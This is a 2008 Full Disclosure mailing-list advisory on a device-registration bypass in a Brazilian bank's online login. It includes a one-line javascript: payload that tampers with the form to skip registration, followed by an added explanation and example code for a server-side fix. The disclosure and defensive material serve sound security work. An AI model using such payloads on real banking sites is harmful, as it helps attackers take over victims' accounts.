Full Disclosure mailing list archives

Re: Brazilian Bank (Caixa Economica Federal) vuln


From: "H2G-Labs Information Security" <h2glabs.infosec () gmail com>
Date: Fri, 20 Jun 2008 10:11:27 -0300

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Hi folks,
some Brazilian banks have been implementing a system based on computer
identification (like a PC register).

The system has some vulns and can be easily exploited.

I am trying to contact the Caixa Economica Federal
(http://www.caixa.gov.br) without success.

If the attacker has the USERNAME and the PASSWORD of the user
account, the attacker can log in to the bank account without identifying
the computer.

To do this, after entering the USERNAME and PASSWORD of the account, put the
code in the browser (on the agree-terms page):
javascript:document.forms[0].onsubmit='';document.forms[0].navegacao.value='16';document.forms[0].submit();void(0);

And you will be logged in, without needing to register/identify your machine.

I hope the CAIXA team solves this problem in a hurry.

Sorry for my bad English, I am Brazilian.

Regards...

This vulnerability has been patched!

Regards...

--
H2G-Labs Information Security
Igor Marcel - Information Security Consultant
H2GLabs.InfoSec "at" Gmail.com

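The bypass above works because the only thing gating the hidden navegacao field is a client-side onsubmit handler, which the browser's owner can clear at will. The following is an added illustration (example code, not from the original post or from Caixa) of the server-side fix: route on session state the server recorded, never on a form value. The field name navegacao and the value '16' come from the post; the session shape, the 'register' action and the deviceId field are assumptions.

```javascript
// Added example: a minimal model of the server side of a "register this
// computer" login flow. Field names/values beyond navegacao='16' are assumed.

// Session state lives server-side; the browser cannot set these flags directly.
function newSession() {
  return { authenticated: false, deviceRegistered: false, suspicious: 0 };
}

// Vulnerable handler: trusts the hidden 'navegacao' field that the page's
// onsubmit handler was supposed to guard. Once onsubmit is cleared, submitting
// navegacao='16' reaches the account page with no registration step.
function handleNavigationInsecure(session, form) {
  if (!session.authenticated) return 'login';
  if (form.navegacao === '16') return 'account';            // skip goes unnoticed
  if (form.navegacao === 'register' && form.deviceId) {
    session.deviceRegistered = true;
    return 'account';
  }
  return 'agree-terms';
}

// Hardened handler: the decision depends on what the server has recorded,
// not on which page the client claims to be coming from.
function handleNavigationSecure(session, form) {
  if (!session.authenticated) return 'login';
  if (form.navegacao === 'register' && form.deviceId) {
    session.deviceRegistered = true;           // set only by a real registration step
  }
  if (!session.deviceRegistered) {
    // A genuine browser never sends navegacao='16' before registration has
    // completed, so this is a useful detection signal for the bank's logs.
    if (form.navegacao === '16') session.suspicious += 1;
    return 'agree-terms';
  }
  return 'account';
}

// Constructed replay of the post's scenario: correct password, device never
// registered, form tampered to jump straight to the account page.
function replayBypass(handler) {
  const session = newSession();
  session.authenticated = true;                 // USERNAME/PASSWORD accepted
  const tamperedForm = { navegacao: '16' };     // what the altered form submits
  return { page: handler(session, tamperedForm), session };
}
```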

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

